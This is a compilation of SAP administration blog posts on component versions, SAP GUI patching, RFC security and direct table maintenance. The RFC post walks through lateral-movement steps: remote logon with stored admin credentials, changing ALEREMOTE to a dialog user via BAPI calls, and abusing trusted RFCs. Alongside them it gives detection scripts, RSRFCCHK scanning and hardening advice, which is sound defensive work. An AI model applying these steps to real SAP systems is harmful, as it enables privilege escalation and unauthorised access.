In an ECC system this list will be very long. Use the option System / List / Save as / local file to download the complete list in text format.

Warning: don't rely on the content of table CVERS. In the past this used to be reliable, but currently it is not any more. The warning from SAP not to rely on it is written in OSS note 2464887. The routines above read the PAT03 table, which holds all the installs, and then determine the most recently installed patch to show. S4HANA systems have both table CVERS and CVERS_ACT for activated components...

Retrieving component information via SQF

You can also retrieve the component information via the Support Query Framework (SQF). Start transaction SQF and launch the Installed Components and Support Packages query:

The query runs fast. Double-click the line to see the results:

SPAM clean up

In some cases inconsistencies can be removed by running RSSPAM15 (SPAM clean up program). This program does multiple cleanups, part of which are CVERS updates.

OSS notes

3390139 – Reported system information (installed software components or products) is missing or incorrect

SAP GUI patching

This blog will zoom in on SAP GUI patching.

Questions that will be addressed are:

  • Where can I find the latest SAP GUI patch availability status?
  • Where can I find the planning for SAP GUI patches?
  • What should be my SAP GUI patch and upgrade policy?

SAP GUI latest patch availability overview and future planned patches

One of the best places to check the latest available patch is the SAP blog: SAP GUI latest patch. This site also contains the planning for the next upcoming patch.

More on the new SAP GUI 8.0 can be found in this blog.

Current SAP GUI support overview

The SAP GUI support dates are published by SAP in OSS note 147519. Note 66971 – Supported SAP GUI platforms contains the supported platforms. This is also important when a new Windows platform (like Windows 11) is released. The expected release dates for GUI patches and versions for Windows are listed in OSS note 1053737 – Expected release dates for SAP GUI for Windows.

GUI integration testing

When upgrading and/or patching SAP GUI, consider the following elements as well:

Corresponding NWBC backend OSS notes

When patching the NWBC front end, or when using NWBC html client, you should also check for server side corrections. The list of most recent note(s) to be applied is kept in OSS note 1353538 – NWBC -Patch Collection- SERVER SIDE (ABAP)+NWBC for HTML. To retrieve your current NWBC backend server patch version follow the instructions in OSS note 1864151 – How to determine the version and Patch Level of NWBC Runtime Environment.

SAP GUI patching policy

SAP GUI and its patches tend to have very short support timelines. An SAP GUI version nowadays is only supported up to max 2 years after release. The reason behind this: the SAP GUI builds on top of Windows components, which have a very short support cycle.

If your company policy is to always have supported IT software, you will have to plan and execute an SAP GUI upgrade almost yearly to stay within full SAP support. Put it on your yearly budget and execution calendar as a recurring item.

If you don’t want to go into this yearly effort of testing, packaging and deploying the SAP GUI to your end users, you can opt for this, as long as you are aware of the consequences. Just make sure of the following two main items:

  1. Inform your IT management and service managers that you run the GUI without support, and they approve it.
  2. Check with your Windows team that the Windows desktops/laptops will still have the libraries that the SAP GUI needs.

SAP system hacking using RFC jump

This blog will explain the SAP system hacking using RFC jump method. It will show the simplicity of the hack, and tell you what to do to prevent this method from being used on your SAP system.

Questions that will be answered:

  • How does the RFC jump SAP system hack work?
  • How do I check all my RFC’s for this weakness?
  • What can I do to prevent this hack from happening on my system?

RFC jump hack background

SAP uses RFC connections between SAP systems to send and receive business data. For example the BI system will pull data from the ECC system via an RFC connection. The SAP solution manager system is fed from the ECC system via an RFC connection. Another example is an SAP netweaver gateway system serving SAP FIORI tiles.

In the RFC setup the system admin will have to set the connection details and its logon method. The logon methods can be:

  • Current user via logon screen
  • Current user via trust logon screen
  • Fixed user ID: dialog user ID or background user ID

The first method with logon screen will prompt for user ID and password and is not useful for hacking.

The trusted connection will check the rights in the other SAP system using your own user ID and privileges.

RFCs with fixed user IDs use the user ID and privileges of the user stored in the RFC connection, together with the password entered by the admin. So you don’t even need to know the password...

3 methods of misusing the RFC jump

3 methods of misusing the RFC jump will be explained. All of the scenarios start from an already compromised system.

RFC jump explained

You have gained access to an SAP system, which in first instance is less important. For example by using standard SAP passwords (see blog on this topic).

1. Using the weakness to jump from one system to another: named dialog users in RFC

Now you start to scan the RFC’s of this server in SM59.

RFC with admin password

You notice that there is an RFC to another system which has the user ID and password of the system admin. You now simply click the remote logon button and you jump to the other system.

Remote logon button

You are logged on now into this system with the user ID and privileges of this other user ID. From this system you can even jump further.

This way you could go from a development to productive server. Or from a BI to an ECC server. Or from Solution manager to ECC productive server.

2. Using the weakness to jump from one system to another: named background users in RFC

The jump will not work if the user ID in the RFC is a background user ID. One example here is the ALEREMOTE user in ECC, which is used by the BI system to extract data from ECC. Since this user has to pull a lot of data and needs a lot of privileges, this user ID is sometimes given SAP_ALL privileges.

If this is the case the hacker can still misuse this RFC. In the hacked system he goes to transaction SE37 and creates a test function module sequence consisting of 2 calls: BAPI_USER_CHANGE and BAPI_TRANSACTION_COMMIT.

function modules

The first call has the input to change the user type of user ID ALEREMOTE from B (background) to type A (dialog). The commit is needed to actually confirm and push the change to the database. Once the sequence is set up the hacker will use the test function to fire the sequence. In the testing the hacker will put in the RFC with the ALEREMOTE user. Now this sequence will be fired with the privileges of the ALEREMOTE user (it has SAP_ALL). So it will then itself change its own user type remotely. After this is done the dialog jump will work from the remote system and the hacker comes into the system with user ALEREMOTE and the attached SAP_ALL rights.

3. Using the weakness to jump from one system to another: trusted RFC’s

If you have taken over one system and you see a trusted RFC towards another system this can be misused for hacking.

Trusted connection

But you need extra information. If you know the user ID of the admin in the target system, set up that user ID in the system already taken over, or if it is already there, reset its password. Then log on to the taken over system with the admin user ID. Go to SM59 and open the trusted connection. Click remote logon and you jump to the other system without having to log on, but with the user ID and privileges of the admin.

For setup of trusted RFC’s read this blog.

How to detect the jumps which are misused?

The complexity in detection is not detecting the jumps themselves, because there is also good use of the jumps (via the trusted RFC’s), but detecting the misused jumps. This is hardly possible.

Detection can be done for the user changes executed by background users. Detection could also be done by tracking the terminal ID suddenly switching user ID.

The SAP audit log can help you find traces of what has happened, as a detective, after-the-fact method. But it will not help you detect or prevent misuse.
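The two detection ideas above (user changes executed by background users, and a terminal ID that suddenly switches user ID), run over a few audit records. This is an added example, not part of the original blog; the record layout, the event names and the 15-minute window are assumptions for illustration and not the real SAP audit log format.

```python
from datetime import datetime, timedelta

# Constructed, simplified records (assumed layout, not the SAP audit log):
# (time, terminal, acting user, acting user's type, event, changed user)
SAMPLE_EVENTS = [
    ("2024-05-01 09:00:05", "PC-0412", "JSMITH", "A", "LOGON", ""),
    ("2024-05-01 09:02:10", "PC-0412", "JSMITH", "A", "RFC_CALL", ""),
    ("2024-05-01 09:02:11", "PC-0412", "ALEREMOTE", "B", "USER_CHANGE", "ALEREMOTE"),
    ("2024-05-01 09:03:40", "PC-0412", "ALEREMOTE", "A", "LOGON", ""),
    ("2024-05-01 10:15:00", "PC-0777", "MJONES", "A", "USER_CHANGE", "TRAINEE01"),
    ("2024-05-01 18:30:00", "PC-0777", "KLEE", "A", "LOGON", ""),
]

# Type B is the background type named in the text; extend for your system.
NON_DIALOG_TYPES = {"B"}
# Assumed window in which a user switch on one terminal counts as "sudden".
SWITCH_WINDOW = timedelta(minutes=15)


def parse(events):
    """Convert the timestamp strings to datetime objects."""
    for ts, terminal, user, utype, event, changed in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        yield when, terminal, user, utype, event, changed


def find_suspicious(events, window=SWITCH_WINDOW):
    """Return findings as tuples, in time order."""
    findings = []
    last_seen = {}  # terminal -> (time, user) of the previous record
    for when, terminal, user, utype, event, changed in sorted(parse(events)):
        # Rule 1: a user master change executed by a non-dialog user.
        if event == "USER_CHANGE" and utype in NON_DIALOG_TYPES:
            findings.append(("NON_DIALOG_USER_CHANGE", when, terminal, user, changed))
        # Rule 2: same terminal, different user, within the window.
        previous = last_seen.get(terminal)
        if previous and previous[1] != user and when - previous[0] <= window:
            findings.append(("TERMINAL_USER_SWITCH", when, terminal, previous[1], user))
        last_seen[terminal] = (when, user)
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_EVENTS):
        print(finding)
```

The legitimate admin change by MJONES and the evening logon of KLEE on the same terminal are not flagged, which shows why both rules need tuning against normal trusted RFC use before they are useful as alerts.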

How to scan your RFC’s for potential misuse?

SAP provides a program to check RFC’s for weak settings: RSRFCCHK.

Running this program will leave system log messages: see OSS note 2724967 - Program CL_SAIS_ Reports Security Breach notification when running program RSRFCCHK.

When you start the program, select all the destinations and optionally the connection test to see if the connections work at all.

RSRFCCHK program

The result will give you a list of potentially dangerous RFC connections and the user ID’s used.

RSRFCCHK program result including connection test

This you can use as a work list for checking.

Read more on RFC security checking in this blog.

Apply note 3283474 – Adjustment of authorization for program RSRFCCHK to upgrade security of program RSRFCCHK itself.

Protection measures

Protection is possible by a series of actions (a single action will not be sufficient):

  • Access restriction. Restriction of access to SU01 user management and SM59 RFC setup. Not only on main systems, but also on connected trusted systems.
  • Remove SAP_ALL and user rights from background and RFC users.
  • At least yearly scan systems for wrongly set up RFC’s and delete them.
  • Instruct basis team never to put in their own account into an RFC connection.

The toughest misunderstanding is with some security and control teams themselves. They heavily underestimate the danger of the trusted connections. They come with statements like “we focus on production only”, or “that system is not part of our compliance XYZ framework check”.

Basic golden principle:
The trusted system must have the same protection level and control measures as the system it is connected to.
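One way to turn the RSRFCCHK work list and the protection measures above into a repeatable check, as an added example (not SAP's or the blog's own code). The CSV layout, the tier names and all destination and user names are constructed; such a sheet would be filled from your own RSRFCCHK result and user master data.

```python
import csv
import io

# Constructed work list (assumed layout): one row per RFC destination.
# "logon" is prompt, trusted or stored; "profiles" is a |-separated list.
SAMPLE = """\
destination,source_tier,target_tier,logon,user,user_type,profiles
BI_TO_ECC,prod,prod,stored,ALEREMOTE,B,SAP_ALL
DEV_ADMIN,dev,prod,stored,BASISADM,A,SAP_ALL|Z_BASIS
SOLMAN_TRUST,dev,prod,trusted,,,
GW_TRUST,prod,prod,trusted,,,
HR_PROMPT,prod,prod,prompt,,,
IDOC_OUT,prod,prod,stored,RFC_IDOC,B,Z_IDOC_MIN
"""

# Assumed ranking of protection levels, lowest first.
TIER_RANK = {"sandbox": 0, "dev": 1, "test": 2, "prod": 3}

F_DIALOG = "stored dialog user: remote logon opens a session as this user"
F_SAP_ALL = "stored user holds SAP_ALL"
F_TRUST = "trusted connection from a less protected system"


def assess(row):
    """Return the list of findings for one destination row."""
    findings = []
    profiles = {p for p in row["profiles"].split("|") if p}
    if row["logon"] == "stored":
        if row["user_type"] == "A":
            findings.append(F_DIALOG)
        if "SAP_ALL" in profiles:
            findings.append(F_SAP_ALL)
    elif row["logon"] == "trusted":
        # Golden principle: the trusted (source) system must be protected
        # at least as well as the system it is connected to.
        if TIER_RANK[row["source_tier"]] < TIER_RANK[row["target_tier"]]:
            findings.append(F_TRUST)
    return findings


def worklist(text):
    """Map destination name -> findings, dropping clean destinations."""
    result = {}
    for row in csv.DictReader(io.StringIO(text)):
        findings = assess(row)
        if findings:
            result[row["destination"]] = findings
    return result


if __name__ == "__main__":
    for name, findings in worklist(SAMPLE).items():
        print(f"{name}: {'; '.join(findings)}")
```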

More RFC hacking: RFC callback hack

Next to the RFC attack methods above there is also the RFC callback hack, which uses the back direction to execute malicious actions. Read more in this blog.

Direct table maintenance versus transport

Some standard SAP tables are delivered by SAP as customizing tables with transports, but are logically and business-wise application tables, and are maintained directly in production by business people. An example is the currency exchange rate table.

This blog will explain the option and best practices to overcome this.

Questions that will be answered:

  • What are current settings and how does it work?
  • When and how to de-customize a standard SAP table?

Current settings

Current settings is a bit of a hidden feature in SAP systems. Per customizing object you can select whether it uses the current settings option or not.

To do this, start transaction SOBJ and select the customizing object or table. The current setting flag is indicated on the example picture below for the currency conversion rate table:

Direct table updates Current settings

The effect of the Current Settings is as follows: if the system client in SCC4 is set to “Productive” the transport flags are ignored, and the user can directly update the table and save the changes without transport request popup.

On a development or quality system the “Productive” setting is not there and the SAP system will prompt you for transport request. Especially on quality systems this can be quite annoying.

The current settings is therefore only a solution for tables that you and the business want to maintain directly on production, and not on a development and quality system. Background note on this side effect is 356483 – In test system, behavior of customizing objects which are editable in production i.e. Current Settings.

See OSS notes 2336175 – SPRO | modifiable | unwanted, 2442887 – SOBJ | How to assign object attribute Current Settings to a maintenance object or 3138477 – SM30 | SPRO | Client XXX has status ‘not modifiable’ | Client role Production for a full instruction.

De-customizing a customizing table

If you want a customizing table to be maintainable directly on development and quality systems, without transport request, you have to de-customize the customizing table.

Always ask for approval for the procedure below and document the tables for which this procedure was applied. Depending on your business security and regulatory requirements more approvals and documentation can be needed.

The de-customization procedure

Step 1 starts with transaction SE11 to call up the table. This you have to do in the development system. In the delivery and maintenance tab the delivery class normally shows as type C (customizing).

Direct table updates Before customizing

Now edit and change it to type A (application):

Direct table updates After application

In most cases this will do the trick. The change itself you have to put in a transport request.

Step 2 would be to re-generate the maintenance view and de-activate the recording routine. This should look as shown on picture below:

Direct table updates check recording routine

Also this change must be executed on development system and must be put in transport request.

Step 3 is to move the transport request into the quality and later productive system.

See also OSS note 3139583 – SPRO | SM30 | SM34 | SV138 Check maintenance object xxx or update function group xxx.

Special cases

Below is a list of special cases and exceptions.

CO allocation cycles (KSU1 etc)

Via the procedure described in OSS Note 853601 – “ALLOCATION: Deactivating the automatic transport” you can leave all the allocation tables as-is and don’t need to apply the de-customization procedure or current settings.

RSA1 settings to avoid transport popup for BI objects

Some settings in RSA1, like process chain starters, you want to set locally per system. By default SAP asks you for a transport. In RSA1 you can overrule this. Select Transport Connection on the left hand side. Then select the button Object Changeability on top. In the popup right click on Not Changeable and set it to Everything Changeable for the items for which you don’t want a transport popup to come.

RSA1 local settings

Save your data.

SAP reference: click here.